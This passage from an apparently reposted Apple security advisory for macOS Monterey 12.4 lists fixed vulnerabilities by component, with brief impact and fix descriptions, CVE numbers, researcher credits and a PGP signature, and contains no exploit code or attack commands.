denial of service  
Description: This issue was addressed with improved checks.  
CVE-2022-0778

PackageKit  
Available for: macOS Monterey  
Impact: A malicious application may be able to modify protected parts  
of the file system  
Description: This issue was addressed by removing the vulnerable  
code.  
CVE-2022-26712: Mickey Jin (@patch1t)

PackageKit  
Available for: macOS Monterey  
Impact: A malicious application may be able to modify protected parts  
of the file system  
Description: This issue was addressed with improved entitlements.  
CVE-2022-26727: Mickey Jin (@patch1t)

Preview  
Available for: macOS Monterey  
Impact: A plug-in may be able to inherit the application's  
permissions and access user data  
Description: This issue was addressed with improved checks.  
CVE-2022-26693: Wojciech Reguła (@_r3ggi) of SecuRing

Printing  
Available for: macOS Monterey  
Impact: A malicious application may be able to bypass Privacy  
preferences  
Description: This issue was addressed by removing the vulnerable  
code.  
CVE-2022-26746: @gorelics

Safari Private Browsing  
Available for: macOS Monterey  
Impact: A malicious website may be able to track users in Safari  
private browsing mode  
Description: A logic issue was addressed with improved state  
management.  
CVE-2022-26731: an anonymous researcher

Security  
Available for: macOS Monterey  
Impact: A malicious app may be able to bypass signature validation  
Description: A certificate parsing issue was addressed with improved  
checks.  
CVE-2022-26766: Linus Henze of Pinauten GmbH (pinauten.de)

SMB  
Available for: macOS Monterey  
Impact: An application may be able to gain elevated privileges  
Description: An out-of-bounds write issue was addressed with improved  
bounds checking.  
CVE-2022-26715: Peter Nguyễn Vũ Hoàng of STAR Labs

SMB  
Available for: macOS Monterey  
Impact: An application may be able to gain elevated privileges  
Description: An out-of-bounds read issue was addressed with improved  
input validation.  
CVE-2022-26718: Peter Nguyễn Vũ Hoàng of STAR Labs

SMB  
Available for: macOS Monterey  
Impact: Mounting a maliciously crafted Samba network share may lead  
to arbitrary code execution  
Description: A memory corruption issue was addressed with improved  
input validation.  
CVE-2022-26723: Felix Poulin-Belanger

SoftwareUpdate  
Available for: macOS Monterey  
Impact: A malicious application may be able to access restricted  
files  
Description: This issue was addressed with improved entitlements.  
CVE-2022-26728: Mickey Jin (@patch1t)

Spotlight  
Available for: macOS Monterey  
Impact: An app may be able to gain elevated privileges  
Description: A validation issue existed in the handling of symlinks  
and was addressed with improved validation of symlinks.  
CVE-2022-26704: an anonymous researcher

TCC  
Available for: macOS Monterey  
Impact: An app may be able to capture a user's screen  
Description: This issue was addressed with improved checks.  
CVE-2022-26726: an anonymous researcher

Tcl  
Available for: macOS Monterey  
Impact: A malicious application may be able to break out of its  
sandbox  
Description: This issue was addressed with improved environment  
sanitization.  
CVE-2022-26755: Arsenii Kostromin (0x3c3e)

WebKit  
Available for: macOS Monterey  
Impact: Processing maliciously crafted web content may lead to code  
execution  
Description: A memory corruption issue was addressed with improved  
state management.  
WebKit Bugzilla: 238178  
CVE-2022-26700: ryuzaki

WebKit  
Available for: macOS Monterey  
Impact: Processing maliciously crafted web content may lead to  
arbitrary code execution  
Description: A use after free issue was addressed with improved  
memory management.  
WebKit Bugzilla: 236950  
CVE-2022-26709: Chijin Zhou of ShuiMuYuLin Ltd and Tsinghua  
wingtecher lab  
WebKit Bugzilla: 237475  
CVE-2022-26710: Chijin Zhou of ShuiMuYuLin Ltd and Tsinghua  
wingtecher lab  
WebKit Bugzilla: 238171  
CVE-2022-26717: Jeonghoon Shin of Theori

WebKit  
Available for: macOS Monterey  
Impact: Processing maliciously crafted web content may lead to  
arbitrary code execution  
Description: A memory corruption issue was addressed with improved  
state management.  
WebKit Bugzilla: 238183  
CVE-2022-26716: SorryMybad (@S0rryMybad) of Kunlun Lab  
WebKit Bugzilla: 238699  
CVE-2022-26719: Dongzhuo Zhao working with ADLab of Venustech

WebRTC  
Available for: macOS Monterey  
Impact: Video self-preview in a webRTC call may be interrupted if the  
user answers a phone call  
Description: A logic issue in the handling of concurrent media was  
addressed with improved state handling.  
WebKit Bugzilla: 237524  
CVE-2022-22677: an anonymous researcher

Wi-Fi  
Available for: macOS Monterey  
Impact: A malicious application may disclose restricted memory  
Description: A memory corruption issue was addressed with improved  
validation.  
CVE-2022-26745: an anonymous researcher

Wi-Fi  
Available for: macOS Monterey  
Impact: An application may be able to execute arbitrary code with  
kernel privileges  
Description: A memory corruption issue was addressed with improved  
memory handling.  
CVE-2022-26761: Wang Yu of Cyberserval

Wi-Fi  
Available for: macOS Monterey  
Impact: A malicious application may be able to execute arbitrary code  
with system privileges  
Description: A memory corruption issue was addressed with improved  
memory handling.  
CVE-2022-26762: Wang Yu of Cyberserval

zip  
Available for: macOS Monterey  
Impact: Processing a maliciously crafted file may lead to a denial of  
service  
Description: A denial of service issue was addressed with improved  
state handling.  
CVE-2022-0530

zlib  
Available for: macOS Monterey  
Impact: An attacker may be able to cause unexpected application  
termination or arbitrary code execution  
Description: A memory corruption issue was addressed with improved  
input validation.  
CVE-2018-25032: Tavis Ormandy

zsh  
Available for: macOS Monterey  
Impact: A remote attacker may be able to cause arbitrary code  
execution  
Description: This issue was addressed by updating to zsh version  
5.8.1.  
CVE-2021-45444

Additional recognition

AppleMobileFileIntegrity  
We would like to acknowledge Wojciech Reguła (@_r3ggi) of SecuRing  
for their assistance.

Bluetooth  
We would like to acknowledge Jann Horn of Project Zero for their  
assistance.

Calendar  
We would like to acknowledge Eugene Lim of Government Technology  
Agency of Singapore for their assistance.

FaceTime  
We would like to acknowledge Wojciech Reguła (@_r3ggi) of SecuRing  
for their assistance.

FileVault  
We would like to acknowledge Benjamin Adolphi of Promon Germany GmbH  
for their assistance.

Login Window  
We would like to acknowledge Csaba Fitzl (@theevilbit) of Offensive  
Security for their assistance.

Photo Booth  
We would like to acknowledge Wojciech Reguła (@_r3ggi) of SecuRing  
for their assistance.

System Preferences  
We would like to acknowledge Mohammad Tausif Siddiqui  
(@toshsiddiqui), an anonymous researcher for their assistance.

WebKit  
We would like to acknowledge James Lee, an anonymous researcher for  
their assistance.

Wi-Fi  
We would like to acknowledge Dana Morrison for their assistance.

macOS Monterey 12.4 may be obtained from the Mac App Store or Apple's  
Software Downloads web site: https://support.apple.com/downloads/  
All information is also posted on the Apple Security Updates  
web site: https://support.apple.com/en-us/HT201222.

This message is signed with Apple's Product Security PGP key,  
and details are available at:  
https://www.apple.com/support/security/pgp/  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCAAdFiEEePiLW1MrMjw19XzoeC9qKD1prhgFAmKC1TUACgkQeC9qKD1p  
rhigoQ//cTnC2MOYau+vO6pv8PHMbeEWPPvtsGpemCNz4iChXRhVOHKxgMQAHEgg  
Ejpxvw5D1jg12wroXypL8ADOD1V20OA7u5A20Lip1NIDL145692jPfmGuNxqkRnI  
DyoykhUogRL8Yvzkd5P8D3Jlo0EzCa4ZhO4tqBwbrGQZRb7gHclMPtzlgt15ZIma  
mH42QGRkJcK8v4MWNIxvibnQPwx3we2k4T8FajBvoCxYinMOlg/j16hFREj8Src+  
rQwKPV6JHiBBQ3LQpGeBlJrFLH72CyHbCu8IqWFYvvDXsT5Gr9JoagW7+g/9+8Wc  
402HjkY4wOZrxIBtlaUlNFZuB1mtIv8amHn9AaVOK/7GALSP6MQzA+U3HUqd3hYV  
J23pw6iRWBTZZSmO31kdEGU/X9uDkDKJL6QxUfzVXPVmOs0VNMmOJUdTRKf3tdsa  
5qnPcjowRONgltX8NqIP0q4aJPr1WigtFGyASIr3me/t9Ft7Kss4gJt7YLDsN6MZ  
opD8hTRHSAXAAYsA57omyo/DnmajHIbUGVEujzAh/DOEYxgT9aaaAHnkNuaQgIbs  
Z5g/dfhDaJodyk0q7BIeK+RPbkvrJvnoBWkRnAUaSgYMX14DQdExlBEvbpcPg71f  
LHzUlUewIuuP/57huTz/b4vEEke0JUwrWk6T1ACbndL3FsPIOX4=  
=jaCZ  
-----END PGP SIGNATURE-----

Tag

#webkit